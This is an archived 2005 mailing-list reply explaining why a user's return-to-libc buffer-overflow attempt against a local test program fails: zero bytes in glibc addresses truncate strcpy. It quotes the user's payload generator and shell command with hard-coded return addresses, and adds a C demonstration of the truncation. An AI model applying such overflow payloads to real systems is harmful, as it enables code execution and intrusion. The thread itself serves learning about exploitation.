Message-ID: <41F5589F.10508@altlinux.ru>
Date: Mon, 24 Jan 2005 23:20:47 +0300
From: Egor Grebnev
Organization: ALT Linux Team
User-Agent: Mozilla Thunderbird 1.0 (X11/20050110)
To: community-en@altlinux.org
Subject: Re: [Comm-en] System call via buffer overflow not working
Content-Type: text/plain; charset=KOI8-R; format=flowed
List-Id: "Mailing list for ALT Linux users (in English only)"

Aaron,

A small comment from Dmitry Levin, a lead developer who isn't subscribed to this mailing list yet. I hope that the original meaning hasn't been lost during translation from Russian ;-)

The technique that you are trying to master is called return-to-libc. It is a bit more complex since, viewed as strings, the function addresses from our glibc contain zero bytes. As a result, strcpy in your sample only copies a part of the string, and the sample doesn't work. You can make a Google search on this topic; many things were written about it some time ago.
Aaron McDonald wrote:
> Here are the typo fixes from my previous email:
>
> //makehex.c
> #include <stdio.h>
>
> int main(void) {
>     char pad[525];              /* 524 filler bytes plus the terminating NUL */
>     int i;
>     for (i = 0; i < 524; i++)
>         pad[i] = 'A';
>     pad[524] = '\0';
>
>     /* Note: the \x00 inside the format string ends the C string there,
>        so printf stops emitting after \x16. */
>     printf("%s\xe0\x9e\x16\x00\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf", pad);
>     return 0;
> }
>
> ./vulner1 $(perl -e 'print "A"x524')$(printf "\xec\x83\x04\x08\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf")
> or
> ./vulner1 $(./makehex) //don't forget to update and recompile makehex
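An added illustration of Dmitry's point (this is not code from the thread): it pushes the four little-endian bytes of an address through strcpy() and counts how many arrive, using the two addresses that appear in the quoted commands, and it measures how much of the makehex.c format tail printf() can even see. The value 0x00169ee0 is the address makehex.c embeds and 0x080483ec the one from the perl command line; which functions they point at is not assumed here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Encode a 32-bit address as it sits in memory on x86 (little-endian),
 * followed by a NUL so the buffer is a valid C string for strcpy(). */
static void encode_le32(uint32_t addr, unsigned char out[5]) {
    out[0] = addr & 0xff;
    out[1] = (addr >> 8) & 0xff;
    out[2] = (addr >> 16) & 0xff;
    out[3] = (addr >> 24) & 0xff;
    out[4] = '\0';
}

/* Copy the encoded address with strcpy() and report how many of the four
 * address bytes reached the destination. strcpy() stops at the first zero
 * byte, so a zero anywhere inside the address cuts the copy short. */
size_t address_bytes_copied(uint32_t addr) {
    unsigned char src[5];
    unsigned char dst[5];
    size_t n = 0;
    encode_le32(addr, src);
    memset(dst, 0xff, sizeof dst);   /* sentinel: marks bytes strcpy never wrote */
    strcpy((char *)dst, (const char *)src);
    while (n < 4 && dst[n] != '\0')
        n++;
    return n;
}

/* The 12-byte tail makehex.c appends after "%s". printf() reads its format
 * as a C string, so nothing after the embedded \x00 is ever emitted. */
static const char MAKEHEX_TAIL[] = "\xe0\x9e\x16\x00\xAA\xAA\xAA\xAA\x73\xfb\xff\xbf";

size_t makehex_tail_emitted(void) {
    return strlen(MAKEHEX_TAIL);     /* 3 of the 12 bytes */
}

int main(void) {
    printf("0x00169ee0 (makehex.c): %zu of 4 bytes survive strcpy\n",
           address_bytes_copied(0x00169ee0u));
    printf("0x080483ec (perl line): %zu of 4 bytes survive strcpy\n",
           address_bytes_copied(0x080483ecu));
    printf("makehex.c tail: printf emits %zu of %zu bytes\n",
           makehex_tail_emitted(), sizeof MAKEHEX_TAIL - 1);
    return 0;
}
```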